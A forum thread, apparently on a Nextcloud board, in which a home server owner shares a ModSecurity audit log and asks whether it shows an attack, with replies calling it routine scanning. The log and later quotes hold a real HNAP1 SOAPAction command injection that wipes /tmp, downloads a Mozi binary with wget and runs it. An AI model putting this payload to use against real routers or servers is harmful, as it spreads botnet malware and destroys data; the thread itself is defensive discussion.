Possible attack found in log maybe critical!?

Searching my modsec_audit.log i found a bad looking record. I am not an expert neither on modsec/owasp nor nextcloud security, but it came in my mind that without modsec this could had been very critical. I post logs here fyi…

--9b16584a-A--
[12/Dec/2019:09:48:54 +0100] XfH@69FbIjAPMe5hD5oFuAAAAAo 223.149.142.18 38346 192.168.2.140 80
--9b16584a-B--
POST /HNAP1/ HTTP/1.0
Host: 84.150.179.8:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640

--9b16584a-F--
HTTP/1.1 302 Found
Strict-Transport-Security: max-age=15768000; includeSubDomains; preload
Location: https://84.150.179.8/HNAP1/
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

--9b16584a-E--
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://84.150.179.8/HNAP1/">here</a>.</p>
</body></html>

--9b16584a-H--
Message: Warning. Match of "rx ^%{tx.allowed_request_content_type_charset}$" against "TX:1" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1044"] [id "920480"] [msg
"Request content type charset is not allowed by policy"] [data "\x22utf-8\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/3.1.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-pr
otocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/CONTENT_TYPE_CHARSET"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"]
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client 223.149.142.18] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type_charset}$" against "TX:1" required. [file "/usr/share/modsecu
rity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1044"] [id "920480"] [msg "Request content type charset is not allowed by policy"] [data "\\\\x22utf-8\\\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/3.
1.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/CONTENT_TYPE_CHARSET"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "O
WASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "84.150.179.8"] [uri "/HNAP1/"] [unique_id "XfH@69FbIjAPMe5hD5oFuAAAAAo"]
Stopwatch: 1576140523050850 11101552 (- - -)
Stopwatch2: 1576140523050850 11101552; combined=13960, p1=9756, p2=0, p3=612, p4=3011, p5=577, sr=1429, sw=4, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.3 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
Server: Apache
Engine-Mode: "ENABLED"

--9b16584a-Z--

Could you please provide some explanation on what this log shows?

Fu, hoped some master could clear that…

I run a nextcloudpi instance on my odroid, i have some security modding done. Turned fail2ban on tweaked the owasp rules to get nextcloud functionalbut not more. If some suspicious activitiy is detected from modsec it will logged in the audit log file. Fail2ban is configured to read the log and ban the ip adresses that violates against owasp security rules.

There are tons of violations in log but this one:

SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget ttp://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m

looks really bad to me, i googled SOAP

SOAP (abbreviation for Simple Object Access Protocol ) is a messaging protocol specification for exchanging structured information in the implementation of web services in computer networks. Its purpose is to provide extensibility, neutrality and independence. It uses XML Information Set for its message format, and relies on application layer protocols, most often Hypertext Transfer Protocol (HTTP), although some legacy systems communicate over Simple Mail Transfer Protocol (SMTP), for message negotiation and transmission.

and this

http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m

load something from a address that is redirected to an ip

https://84.150.179.8/HNAP1/

get it in /tmp, make it excecuteable and run it!?!

With some kind of exploit, as said above i am no security pro, but smells like ransomware or botnet shit or i am just nervous who knows…

read logs just sometimes but regularily, never read something like this.

If this is trivial, sorry for waste your time.

As far as I understand it, you would need to have a listening SOAP server. Those kind of “attacks” are very common. If you check your logs you will also find hundred of ssh login attempts with common username/password combinations. This is just what the Internet is like. You could probably install an application firewall and block all SOAP requests, if you don’t use it. I am not familiar with modsec.

So in summary, I think, this is nothing to worry about and just the regular attack background noise of the Internet.

watch your language, dude!

this is a local ip-address… so maybe you wanna find out which machine in your local network was assigned with that number. (a.b.c.1 -adresses are often assigned to routers but not always).

You got the “fu” wrong, wasn’t meant that way.

My home devices are using 192.168.2.XXX, theres nothing in this range here…

But to clarify: I don’t need help or an explaination what was going on there. I wanted to show this log to the devs. I had concerns if someone (i think the most of you) have nextcloud without modsecurity this attack had not been blocked. Maybe this is a vulnerability that is not known and has to be fixed. Btw: the remote ip address is another nextcloud https://84.150.179.8/HNAP1/

This is what i believe too, so it was a blind shot and couldn’t harm. Like i said: i often search the logs but this was something i saw the first time.

Thank you

ok… accepted